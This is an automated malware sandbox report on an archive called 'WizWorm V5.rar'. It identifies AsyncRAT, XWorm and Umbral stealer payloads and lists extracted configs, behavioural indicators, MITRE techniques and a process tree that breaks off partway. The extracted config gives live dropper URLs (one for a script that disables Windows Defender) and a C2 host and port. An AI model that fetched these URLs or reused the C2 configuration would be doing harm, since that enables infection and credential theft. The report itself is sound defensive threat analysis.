asyncrat | fc2c1679e7d3b6abb01b8c38dec3f16d56d173940a06181244330aa0bc30ab4c

Analysis

max time kernel
178s
max time network
278s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
19-07-2024 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WizWorm V5.rar
Size

22.7MB
MD5

630e09943078d4b853c4d2298bd141ba
SHA1

5b8a3522db39e09bc4daf36b420ee5671e6dd941
SHA256

fc2c1679e7d3b6abb01b8c38dec3f16d56d173940a06181244330aa0bc30ab4c
SHA512

fc591a3104e2aa8533762d2d27881ed5517a67fb8915c162b49ebac2653bde51c379725a96883edc056293696c73188580cc7963b4af5ba50bb4e315ce1d498e
SSDEEP

393216:uAPLtj+wSrV5LLmx9KZlGlDAzkG7N2mZ8GeVnBmdRqBXsXG6kik5l1aGEWvPBqeC:uum5R5zkG7/OGe6dReXN6CuGpvC

Score

10^/10

asyncrat umbral xworm default execution rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/eq44/d/raw/main/wzcstatus.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Version

3.1

true-baghdad.gl.at.ply.gg:61202

Mutex

Z0m98pC7RpsdD0uc

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Version

WeedRAT

Botnet

Default

true-baghdad.gl.at.ply.gg:61202

Mutex

xInKFBCkbzDz

Attributes

delay
3
install
true
install_file
wzcdetect.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Umbral payload 29 IoCs

resource	yara_rule
behavioral1/files/0x000700000002352e-96.dat	family_umbral
behavioral1/memory/3000-106-0x000001D34AFB0000-0x000001D34AFF0000-memory.dmp	family_umbral
behavioral1/memory/2648-814-0x000002740CD00000-0x000002740CD40000-memory.dmp	family_umbral
behavioral1/memory/4548-885-0x000002669EFF0000-0x000002669F030000-memory.dmp	family_umbral
behavioral1/memory/4844-1116-0x000001CFEE010000-0x000001CFEE050000-memory.dmp	family_umbral
behavioral1/memory/1920-1151-0x0000017767D30000-0x0000017767D70000-memory.dmp	family_umbral
behavioral1/memory/732-1207-0x00000245D6060000-0x00000245D60A0000-memory.dmp	family_umbral
behavioral1/memory/4852-1250-0x000002AE4C9D0000-0x000002AE4CA10000-memory.dmp	family_umbral
behavioral1/memory/1604-1340-0x000001BDAB8F0000-0x000001BDAB930000-memory.dmp	family_umbral
behavioral1/memory/1980-1385-0x000001BC75F60000-0x000001BC75FA0000-memory.dmp	family_umbral
behavioral1/memory/4708-1532-0x000001EBCFF90000-0x000001EBCFFD0000-memory.dmp	family_umbral
behavioral1/memory/3232-1667-0x0000016E905C0000-0x0000016E90600000-memory.dmp	family_umbral
behavioral1/memory/1788-1799-0x0000016E379A0000-0x0000016E379E0000-memory.dmp	family_umbral
behavioral1/memory/5396-1869-0x00000234AA2E0000-0x00000234AA320000-memory.dmp	family_umbral
behavioral1/memory/5916-2025-0x0000028379070000-0x00000283790B0000-memory.dmp	family_umbral
behavioral1/memory/5764-2149-0x0000025A02DC0000-0x0000025A02E00000-memory.dmp	family_umbral
behavioral1/memory/1068-2241-0x0000015E590C0000-0x0000015E59100000-memory.dmp	family_umbral
behavioral1/memory/5620-2341-0x0000026EA4D20000-0x0000026EA4D60000-memory.dmp	family_umbral
behavioral1/memory/3852-2620-0x0000020E669F0000-0x0000020E66A30000-memory.dmp	family_umbral
behavioral1/memory/5444-2712-0x000001B707D90000-0x000001B707DD0000-memory.dmp	family_umbral
behavioral1/memory/4280-2975-0x0000029349270000-0x00000293492B0000-memory.dmp	family_umbral
behavioral1/memory/5256-3069-0x000002C4F16D0000-0x000002C4F1710000-memory.dmp	family_umbral
behavioral1/memory/3256-3341-0x000001E112210000-0x000001E112250000-memory.dmp	family_umbral
behavioral1/memory/5764-3433-0x000001C38F6A0000-0x000001C38F6E0000-memory.dmp	family_umbral
behavioral1/memory/5724-3641-0x000001651B820000-0x000001651B860000-memory.dmp	family_umbral
behavioral1/memory/5752-4477-0x00000299519E0000-0x0000029951A20000-memory.dmp	family_umbral
behavioral1/memory/1788-5040-0x0000021E27F70000-0x0000021E27FB0000-memory.dmp	family_umbral
behavioral1/memory/5456-5053-0x0000017F32790000-0x0000017F327D0000-memory.dmp	family_umbral
behavioral1/memory/1560-5320-0x000002547E4D0000-0x000002547E510000-memory.dmp	family_umbral

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3944-89-0x000001AEFCB70000-0x000001AEFCB7E000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000800000002352c-85.dat	family_asyncrat

Blocklisted process makes network request 16 IoCs

flow	pid	Process
79	3944	powershell.exe
81	760	powershell.exe
82	760	powershell.exe
84	5292	powershell.exe
85	5292	powershell.exe
86	3360	powershell.exe
87	3360	powershell.exe
89	5416	powershell.exe
91	5416	powershell.exe
100	5172	powershell.exe
101	5172	powershell.exe
102	1592	powershell.exe
103	5228	powershell.exe
104	1592	powershell.exe
105	5228	powershell.exe
119	3944	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5796	powershell.exe
4088	powershell.exe
6004	powershell.exe
5596	powershell.exe
3788	powershell.exe
1844	powershell.exe
5384	powershell.exe
4396	powershell.exe
5692	powershell.exe
5460	powershell.exe
5596	powershell.exe
5912	powershell.exe
5228	powershell.exe
2824	powershell.exe
1980	powershell.exe
3944	powershell.exe
3328	powershell.exe
3572	powershell.exe
2708	powershell.exe
548	powershell.exe
5260	powershell.exe
2508	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe

Checks computer location settings 2 TTPs 41 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WeedClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	wzcnetwork.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WeedClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WeedClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WeedClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	wzcstatus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	wzcstatus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WizWorm V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	wzcstatus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WeedClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WeedClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	wzcstatus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WizWormV4.exe

Executes dropped EXE 64 IoCs

pid	Process
4780	WizWorm V5.exe
3576	WizWormV4.exe
4316	WizWormV4.exe
4376	RoboterXRAT V5.exe
4548	WizWormV4.exe
1564	RoboterXRAT V5.exe
180	RoboterXRAT V5.exe
4836	WeedClient.exe
3000	sihost.exe
1632	WizWormV4.exe
4916	RoboterXRAT V5.exe
2336	RoboterXRAT V5.exe
3288	WeedClient.exe
4412	sihost.exe
3180	WizWormV4.exe
1592	RoboterXRAT V5.exe
2120	WeedClient.exe
4316	RoboterXRAT V5.exe
180	sihost.exe
3300	RoboterXRAT V5.exe
380	WeedClient.exe
4404	sihost.exe
3332	WizWormV4.exe
4932	RoboterXRAT V5.exe
5184	RoboterXRAT V5.exe
5196	WeedClient.exe
5348	sihost.exe
5580	WizWormV4.exe
5600	RoboterXRAT V5.exe
5644	WeedClient.exe
5688	RoboterXRAT V5.exe
5796	sihost.exe
6076	RoboterXRAT V5.exe
6096	WeedClient.exe
1744	wzcdetect.exe
2680	sihost.exe
180	WizWormV4.exe
4044	WeedClient.exe
2436	RoboterXRAT V5.exe
5204	sihost.exe
5524	RoboterXRAT V5.exe
5272	wzcdetect.exe
5240	WeedClient.exe
6112	sihost.exe
5756	wzcdetect.exe
2436	RoboterXRAT V5.exe
4376	WeedClient.exe
3896	wzcstatus.exe
5236	sihost.exe
2624	wzcdetect.exe
6060	RoboterXRAT V5.exe
5552	WeedClient.exe
5264	wzcnetwork.exe
5128	sihost.exe
1812	wzcsvc.exe
3164	wzcstatus.exe
5796	wzcstatus.exe
4376	RoboterXRAT V5.exe
3740	WeedClient.exe
5012	sihost.exe
5964	wzcstatus.exe
2112	RoboterXRAT V5.exe
5856	wzcnetwork.exe
6076	wzcstatus.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 32 IoCs

Web Service

T1102

flow	ioc
214	discord.com
120	discord.com
129	discord.com
196	discord.com
203	discord.com
204	discord.com
98	raw.githubusercontent.com
121	discord.com
138	discord.com
189	discord.com
105	raw.githubusercontent.com
155	discord.com
156	discord.com
172	discord.com
197	discord.com
106	discord.com
145	discord.com
146	discord.com
215	discord.com
222	discord.com
164	discord.com
181	discord.com
91	raw.githubusercontent.com
137	discord.com
165	discord.com
171	discord.com
180	discord.com
90	raw.githubusercontent.com
107	discord.com
130	discord.com
190	discord.com
221	discord.com

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
74	ip-api.com
142	ip-api.com
175	ip-api.com
124	ip-api.com
134	ip-api.com
150	ip-api.com
193	ip-api.com
111	ip-api.com
159	ip-api.com
200	ip-api.com
208	ip-api.com
168	ip-api.com
184	ip-api.com
218	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
5972	timeout.exe
5932	timeout.exe
5244	timeout.exe
5816	timeout.exe
5772	timeout.exe

Detects videocard installed 1 TTPs 14 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2684	wmic.exe
5908	wmic.exe
1852	wmic.exe
5448	wmic.exe
1984	wmic.exe
5260	wmic.exe
640	wmic.exe
1120	wmic.exe
5292	wmic.exe
2364	wmic.exe
5976	wmic.exe
5168	wmic.exe
2600	wmic.exe
412	wmic.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE

Runs net.exe

Runs ping.exe 1 TTPs 13 IoCs

Remote System Discovery

T1018

pid	Process
6092	PING.EXE
5256	PING.EXE
364	PING.EXE
6112	PING.EXE
512	PING.EXE
4436	PING.EXE
5784	PING.EXE
3288	PING.EXE
1504	PING.EXE
868	PING.EXE
5284	PING.EXE
4728	PING.EXE
4900	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5012	schtasks.exe
3684	schtasks.exe
2680	schtasks.exe
5316	schtasks.exe
5432	schtasks.exe
5932	schtasks.exe
5404	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3944	powershell.exe
3944	powershell.exe
3328	powershell.exe
3328	powershell.exe
3328	powershell.exe
3000	sihost.exe
3000	sihost.exe
1844	powershell.exe
1844	powershell.exe
1844	powershell.exe
3572	powershell.exe
3572	powershell.exe
408	powershell.exe
408	powershell.exe
3572	powershell.exe
408	powershell.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
4836	WeedClient.exe
1788	powershell.exe
1788	powershell.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
1788	powershell.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
3288	WeedClient.exe
760	powershell.exe
760	powershell.exe
760	powershell.exe
5292	powershell.exe
5292	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4372	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4372	7zFM.exe
Token: 35	4372	7zFM.exe
Token: SeSecurityPrivilege	4372	7zFM.exe
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeDebugPrivilege	3000	sihost.exe
Token: SeIncreaseQuotaPrivilege	3056	wmic.exe
Token: SeSecurityPrivilege	3056	wmic.exe
Token: SeTakeOwnershipPrivilege	3056	wmic.exe
Token: SeLoadDriverPrivilege	3056	wmic.exe
Token: SeSystemProfilePrivilege	3056	wmic.exe
Token: SeSystemtimePrivilege	3056	wmic.exe
Token: SeProfSingleProcessPrivilege	3056	wmic.exe
Token: SeIncBasePriorityPrivilege	3056	wmic.exe
Token: SeCreatePagefilePrivilege	3056	wmic.exe
Token: SeBackupPrivilege	3056	wmic.exe
Token: SeRestorePrivilege	3056	wmic.exe
Token: SeShutdownPrivilege	3056	wmic.exe
Token: SeDebugPrivilege	3056	wmic.exe
Token: SeSystemEnvironmentPrivilege	3056	wmic.exe
Token: SeRemoteShutdownPrivilege	3056	wmic.exe
Token: SeUndockPrivilege	3056	wmic.exe
Token: SeManageVolumePrivilege	3056	wmic.exe
Token: 33	3056	wmic.exe
Token: 34	3056	wmic.exe
Token: 35	3056	wmic.exe
Token: 36	3056	wmic.exe
Token: SeDebugPrivilege	3328	powershell.exe
Token: SeIncreaseQuotaPrivilege	3056	wmic.exe
Token: SeSecurityPrivilege	3056	wmic.exe
Token: SeTakeOwnershipPrivilege	3056	wmic.exe
Token: SeLoadDriverPrivilege	3056	wmic.exe
Token: SeSystemProfilePrivilege	3056	wmic.exe
Token: SeSystemtimePrivilege	3056	wmic.exe
Token: SeProfSingleProcessPrivilege	3056	wmic.exe
Token: SeIncBasePriorityPrivilege	3056	wmic.exe
Token: SeCreatePagefilePrivilege	3056	wmic.exe
Token: SeBackupPrivilege	3056	wmic.exe
Token: SeRestorePrivilege	3056	wmic.exe
Token: SeShutdownPrivilege	3056	wmic.exe
Token: SeDebugPrivilege	3056	wmic.exe
Token: SeSystemEnvironmentPrivilege	3056	wmic.exe
Token: SeRemoteShutdownPrivilege	3056	wmic.exe
Token: SeUndockPrivilege	3056	wmic.exe
Token: SeManageVolumePrivilege	3056	wmic.exe
Token: 33	3056	wmic.exe
Token: 34	3056	wmic.exe
Token: 35	3056	wmic.exe
Token: 36	3056	wmic.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	408	powershell.exe
Token: SeDebugPrivilege	4836	WeedClient.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	3288	WeedClient.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	5292	powershell.exe
Token: SeDebugPrivilege	380	WeedClient.exe
Token: SeDebugPrivilege	6084	powershell.exe
Token: SeDebugPrivilege	5196	WeedClient.exe
Token: SeDebugPrivilege	3360	powershell.exe
Token: SeDebugPrivilege	5416	powershell.exe
Token: SeDebugPrivilege	5644	WeedClient.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	5912	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4372	7zFM.exe
4372	7zFM.exe
5396	Process not Found

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3748	OpenWith.exe
3748	OpenWith.exe
3748	OpenWith.exe
3748	OpenWith.exe
3748	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4780 wrote to memory of 3576	4780	WizWorm V5.exe	115
PID 4780 wrote to memory of 3576	4780	WizWorm V5.exe	115
PID 3576 wrote to memory of 4316	3576	WizWormV4.exe	116
PID 3576 wrote to memory of 4316	3576	WizWormV4.exe	116
PID 3576 wrote to memory of 4332	3576	WizWormV4.exe	117
PID 3576 wrote to memory of 4332	3576	WizWormV4.exe	117
PID 3576 wrote to memory of 4376	3576	WizWormV4.exe	119
PID 3576 wrote to memory of 4376	3576	WizWormV4.exe	119
PID 4316 wrote to memory of 4548	4316	WizWormV4.exe	120
PID 4316 wrote to memory of 4548	4316	WizWormV4.exe	120
PID 4316 wrote to memory of 1088	4316	WizWormV4.exe	121
PID 4316 wrote to memory of 1088	4316	WizWormV4.exe	121
PID 4316 wrote to memory of 1564	4316	WizWormV4.exe	123
PID 4316 wrote to memory of 1564	4316	WizWormV4.exe	123
PID 4332 wrote to memory of 3332	4332	cmd.exe	124
PID 4332 wrote to memory of 3332	4332	cmd.exe	124
PID 3332 wrote to memory of 1920	3332	net.exe	125
PID 3332 wrote to memory of 1920	3332	net.exe	125
PID 1088 wrote to memory of 2528	1088	cmd.exe	126
PID 1088 wrote to memory of 2528	1088	cmd.exe	126
PID 2528 wrote to memory of 4180	2528	net.exe	127
PID 2528 wrote to memory of 4180	2528	net.exe	127
PID 4332 wrote to memory of 3944	4332	cmd.exe	128
PID 4332 wrote to memory of 3944	4332	cmd.exe	128
PID 4376 wrote to memory of 180	4376	RoboterXRAT V5.exe	216
PID 4376 wrote to memory of 180	4376	RoboterXRAT V5.exe	216
PID 4376 wrote to memory of 4836	4376	RoboterXRAT V5.exe	131
PID 4376 wrote to memory of 4836	4376	RoboterXRAT V5.exe	131
PID 4376 wrote to memory of 4836	4376	RoboterXRAT V5.exe	131
PID 4376 wrote to memory of 3000	4376	RoboterXRAT V5.exe	132
PID 4376 wrote to memory of 3000	4376	RoboterXRAT V5.exe	132
PID 4548 wrote to memory of 1632	4548	WizWormV4.exe	133
PID 4548 wrote to memory of 1632	4548	WizWormV4.exe	133
PID 4548 wrote to memory of 4044	4548	WizWormV4.exe	230
PID 4548 wrote to memory of 4044	4548	WizWormV4.exe	230
PID 4548 wrote to memory of 4916	4548	WizWormV4.exe	136
PID 4548 wrote to memory of 4916	4548	WizWormV4.exe	136
PID 4044 wrote to memory of 1812	4044	cmd.exe	274
PID 4044 wrote to memory of 1812	4044	cmd.exe	274
PID 3000 wrote to memory of 3056	3000	sihost.exe	138
PID 3000 wrote to memory of 3056	3000	sihost.exe	138
PID 1812 wrote to memory of 2408	1812	net.exe	165
PID 1812 wrote to memory of 2408	1812	net.exe	165
PID 1088 wrote to memory of 3328	1088	cmd.exe	141
PID 1088 wrote to memory of 3328	1088	cmd.exe	141
PID 3000 wrote to memory of 2476	3000	sihost.exe	225
PID 3000 wrote to memory of 2476	3000	sihost.exe	225
PID 3000 wrote to memory of 1844	3000	sihost.exe	144
PID 3000 wrote to memory of 1844	3000	sihost.exe	144
PID 180 wrote to memory of 2336	180	RoboterXRAT V5.exe	146
PID 180 wrote to memory of 2336	180	RoboterXRAT V5.exe	146
PID 180 wrote to memory of 3288	180	RoboterXRAT V5.exe	147
PID 180 wrote to memory of 3288	180	RoboterXRAT V5.exe	147
PID 180 wrote to memory of 3288	180	RoboterXRAT V5.exe	147
PID 180 wrote to memory of 4412	180	RoboterXRAT V5.exe	148
PID 180 wrote to memory of 4412	180	RoboterXRAT V5.exe	148
PID 4044 wrote to memory of 3572	4044	cmd.exe	149
PID 4044 wrote to memory of 3572	4044	cmd.exe	149
PID 3000 wrote to memory of 408	3000	sihost.exe	150
PID 3000 wrote to memory of 408	3000	sihost.exe	150
PID 1632 wrote to memory of 3180	1632	WizWormV4.exe	152
PID 1632 wrote to memory of 3180	1632	WizWormV4.exe	152
PID 4916 wrote to memory of 1592	4916	RoboterXRAT V5.exe	258
PID 4916 wrote to memory of 1592	4916	RoboterXRAT V5.exe	258

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5784	attrib.exe
1692	attrib.exe
5408	attrib.exe
5408	attrib.exe
3788	attrib.exe
2476	attrib.exe
5704	attrib.exe
4556	attrib.exe
2284	attrib.exe
6000	attrib.exe
5140	attrib.exe
5908	attrib.exe
940	attrib.exe
5260	attrib.exe
5984	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1020

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1140
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1380
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
